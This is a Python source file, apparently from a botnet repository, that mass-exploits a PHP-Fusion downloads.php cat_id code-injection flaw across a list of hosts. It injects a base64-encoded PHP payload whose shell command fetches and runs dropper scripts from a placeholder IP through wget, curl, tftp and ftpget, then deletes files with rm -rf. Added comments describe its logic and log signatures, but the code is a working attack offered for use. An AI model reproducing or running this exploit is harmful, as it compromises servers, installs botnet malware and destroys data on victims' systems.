R00tS3c
GitHub Repository: R00tS3c/DDOS-RootSec
Path: blob/master/Botnets/Exploits/PHPFusion.py
import base64
import sys
import threading
import requests
import os
import subprocess
from Queue import *
from threading import Thread
#Get argv1 and parse it to the Queue
11
ips = open(sys.argv[1], "r").readlines()
12
queue = Queue()
13
queue_count = 0
def php(cmd):
    """Run *cmd* on the local machine through the shell.

    subprocess.call(..., shell=True) passes the whole string to the shell;
    the exit status is not returned to the caller. Nothing in the visible
    listing calls this function.
    """
    subprocess.call(cmd, shell=True)
#Replace this with your payload
18
cmd = "cd /tmp || cd /var/run || cd /mnt; wget http://IP/BINS.sh; curl -O http://IP/BINS.sh; chmod 777 BINS.sh; /bin/sh BINS.sh; tftp IP -c get tBINS.sh; chmod 777 tBINS.sh; /bin/sh tBINS.sh; tftp -r tBINS2.sh -g IP; chmod 777 tBINS2.sh; /bin/sh tBINS2.sh; ftpget -v -u anonymous -p anonymous -P 21 IP BINS1.sh BINS1.sh; /bin/sh BINS1.sh; rm -rf BINS.sh tBINS.sh tBINS2.sh BINS1.sh; rm -rf *"
19
20
21
# Begin exploit config
22
PAYLOAD = "php -r '$sock=fsockopen(\"127.0.0.1\",4444);exec(\""+cmd+"\");' " # !!spaces are important in order to avoid ==!!
23
REQUEST_PAYLOAD = "/infusions/downloads/downloads.php?cat_id=$\{{system(base64_decode({})).exit\}}"
24
# End exploit config
25
26
27
# Encode payload to be ran on PHPFusion server
28
PAYLOAD_B64 = base64.b64encode(PAYLOAD.encode('ascii')).decode("ascii").strip("=")
def phpfusion(host):
    """Probe one host for the downloads.php `cat_id` injection, then send the payload request.

    host: one entry from the target file; the probe prepends "http://" to it.

    The "[PHPFusion] Infected" line is printed unconditionally before any
    request is made, so this tool's console output is not evidence that a
    host was compromised; the web server's own logs are needed for that.

    Any exception raised inside the try block is discarded by the bare
    `except`, so failures leave no trace in the output. Always returns None.

    NOTE(review): the page lost the original indentation; the nesting below
    (second request and second print inside the `if`) is reconstructed.
    """
    print("[PHPFusion] Infected "+host)
    try:
        # Probe: ask the server to evaluate system(ls) through cat_id. No
        # headers are passed, so the requests library's default User-Agent is
        # sent - a usable log signature alongside the `${system(` string.
        page_data = requests.get("http://" + host + "/infusions/downloads/downloads.php?cat_id=${system(ls)}")
        # A response containing "infusion_db.php" is treated as a positive
        # result - presumably because that file name would appear in the
        # `ls` output of the infusion directory; verify against a real install.
        if "infusion_db.php" in page_data.text:
            # Second GET, for host + REQUEST_PAYLOAD with the base64 payload
            # substituted into the template.
            requests.get(host + REQUEST_PAYLOAD.format(PAYLOAD_B64))
            print("[PHPFusion] Infected "+host)
    except:
        pass
    return
def main():
    """Queue every line of the target file and start one thread per entry.

    Phase 1 strips carriage returns and newlines from each line of `ips`,
    puts it on the module-level `queue`, and rewrites a running count on
    stdout. Phase 2 takes `queue_count` entries back off the queue and
    starts a Thread running phpfusion() for each one; there is no cap on
    the number of threads, so a large target file produces a burst of
    concurrent outbound HTTP requests from the scanning machine.

    NOTE(review): the page lost the original indentation; the nesting below
    (join after the dispatch loop) is reconstructed.
    """
    global queue_count
    for line in ips:
        line = line.strip("\r")
        line = line.strip("\n")
        queue_count += 1
        # "\r" returns to the start of the line so the counter overwrites itself.
        sys.stdout.write("\r[%d] Added to queue" % (queue_count))
        sys.stdout.flush()
        queue.put(line)
    sys.stdout.write("\n")
    i = 0
    while i != queue_count:
        i += 1
        try:
            # `input` shadows the builtin of the same name inside this function.
            input = queue.get()
            thread = Thread(target=phpfusion, args=(input,))
            thread.start()
        except KeyboardInterrupt:
            # Ctrl-C: send signal 9 to this process, ending it immediately.
            os.kill(os.getpid(), 9)
    # Only the most recently started thread is joined here.
    thread.join()
    return
# Run main() only when the file is executed as a script. The module-level
# statements above still run on import, including the read of sys.argv[1].
if __name__ == "__main__":
    main()